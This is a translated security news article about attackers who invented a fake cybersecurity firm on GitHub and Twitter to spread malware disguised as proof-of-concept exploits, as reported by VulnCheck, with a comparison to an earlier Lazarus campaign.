Saturday, April 13, 2024
HomeSECURITYAttackers have invented an entire cybersecurity firm to effectively distribute malicious PoC...

Attackers have invented an entire cybersecurity firm to effectively distribute malicious PoC exploits

-


Attackers have invented an entire cybersecurity firm to effectively distribute malicious PoC exploits

Authoritative experts from “High Sierra Cyber ​​Security” turned out to be nothing more than a fake, with someone else’s photos and data.


Recently discovered researchers VulnCheck the malicious campaign proves once again that attackers are constantly inventing new and new strategies in an attempt to fool their victims and get what they want.

Last month on GitHub and in Twitter * fake accounts began to appear imitating security researchers from various large companies. On behalf of white hackers, united “under the roof” of the fictitious company “High Sierra Cyber ​​Security”, the attackers publish fake PoC– exploits for zero-day vulnerabilities that, ironically, infect computers on Windows And linux malware.

The hacker accounts look quite legitimate as they imitate real researchers from various cybersecurity companies using their names and photos.



Fake accounts pretending to be real professionals

According to the researchers, attackers mainly publish exploits for zero-day vulnerabilities in popular software such as Chrome, Discord, Signal, WhatsApp and Microsoft Exchange. In all cases, the malicious repositories contain a Python script that acts as a malware loader for Linux and Windows systems.

The script downloads a ZIP archive from an external URL to the victim’s computer depending on its operating system: Linux users download “cveslinux.zip” and Windows users get “cveswindows.zip”. The malware is stored in the %Temp% folder for Windows or /home//.local/share for Linux, extracted, and run.

VulnCheck reports that the Windows executable is detected by over 60% of antivirus engines on VirusTotal. When as an executable file for Linux is much more secretive and is detected by only three scanners.

The scope and number of victims of this campaign is still unclear, but VulnCheck notes that the attackers are quite persistent and regularly create new accounts and repositories when existing ones are deleted due to complaints.

Cybersecurity researchers and enthusiasts should be extremely careful when downloading scripts from unknown repositories, as the owner of one of these repositories may well be scammers.

North Korean hacker group Lazarus ran a similar campaign in early 2021. Back then, digital thugs also created fake social media profiles of vulnerability researchers to attack researchers with malware disguised as PoC exploits.

By infecting the devices of cybersecurity researchers, attackers can gain access to unpublished research on vulnerabilities that can later be used in their own attacks. Or better yet, carry out a ransomware attack, after which the company’s reputation will be permanently damaged. After all, what kind of cybersecurity company is this, which itself did not protect itself from the attack.

When you download code from GitHub, you need to carefully check it for malicious behavior. In the case discussed above, the loading and execution of malware is visible to the naked eye when examining the code, but this may not always be the case, especially if attackers deliberately obfuscate the malicious code. That is why the vigilance of researchers against the background of such attacks should be maximum.


* The social network is prohibited on the territory of the Russian Federation.



Source link

www.securitylab.ru

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular